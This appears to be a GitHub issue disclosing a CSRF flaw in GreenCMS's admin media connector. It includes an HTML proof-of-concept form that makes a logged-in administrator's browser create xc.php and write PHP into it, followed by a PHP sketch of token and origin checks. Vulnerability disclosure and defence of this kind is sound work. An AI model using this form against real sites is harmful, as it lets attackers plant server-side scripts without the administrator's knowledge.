GreenCMS has a CSRF vulnerability that can be used to obtain a webshell #108

Open
anquanquantao opened this issue Jun 1, 2018 · 2 comments
anquanquantao commented Jun 1, 2018

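Vulnerability discovered by: 惜潮
A malicious attacker can craft an HTML page and thereby obtain a webshell on the site.

Exploit code
The exploit code is as follows: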

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>csrf测试</title>
</head>
<body>
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
	<!-- The following creates a script file named xc.php; path: 127.0.0.1/Upload/xc.php -->
	<script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
	<input type="hidden" name="cmd" value="put">
	<input type="hidden" name="target" value="l1_eGMucGhw">
	<input type="hidden" name="content" value="<?php phpinfo();?>">
	<!-- The following submits the form, writing the command in content into the script -->
	<button type="submit" value="Submit">WebShell</button>
</form>
</body>
</html>
```
@TimothyZhang023
Contributor

As I recall, fileconnect requires login permissions, and that permission is not granted to ordinary users.

@anquanquantao
Author

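A CSRF attack generally means that after an administrator has logged in and visits a CSRF page crafted by the attacker, the browser sends the request with the administrator's cookies, so the operation is performed as the administrator. The usual defences are to check the source of the page request or to add a random token.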
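
The two defences named in the comment above (a request-source check and a random token), sketched in PHP as an added example that is not part of the original thread and is not GreenCMS code. The function names and the `csrf_token` parameter are assumptions; the gate covers query-string parameters as well as POST bodies because the report sends `cmd=mkfile` in a URL.

```php
<?php
// Added illustration, not GreenCMS code. Function names and the
// 'csrf_token' parameter are assumptions.

// Issue one random token per session; embed it in every admin form and URL
// that changes state.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Request-source check: Origin if present, otherwise Referer, must name our host.
function csrf_same_origin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Gate for a state-changing action. $params must merge query string and body,
// because the action reads cmd from either.
function csrf_allow(array $session, array $server, array $params, string $expectedHost): bool
{
    $sent  = $params['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return false;
    }
    return csrf_same_origin($server, $expectedHost);
}

// Constructed sample requests (in an application: $_SESSION, $_SERVER, $_GET + $_POST).
$session = [];
$token = csrf_issue_token($session);

// Cross-site GET carrying cookies but no token, referred from another host.
$crossSite = csrf_allow($session, ['HTTP_REFERER' => 'http://attacker.example/page.html'],
    ['cmd' => 'mkfile', 'name' => 'xc.php'], '127.0.0.1');

// Same-site POST from the admin panel with the session token.
$sameSite = csrf_allow($session, ['HTTP_ORIGIN' => 'http://127.0.0.1'],
    ['cmd' => 'put', 'csrf_token' => $token], '127.0.0.1');

var_dump($crossSite, $sameSite);
```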
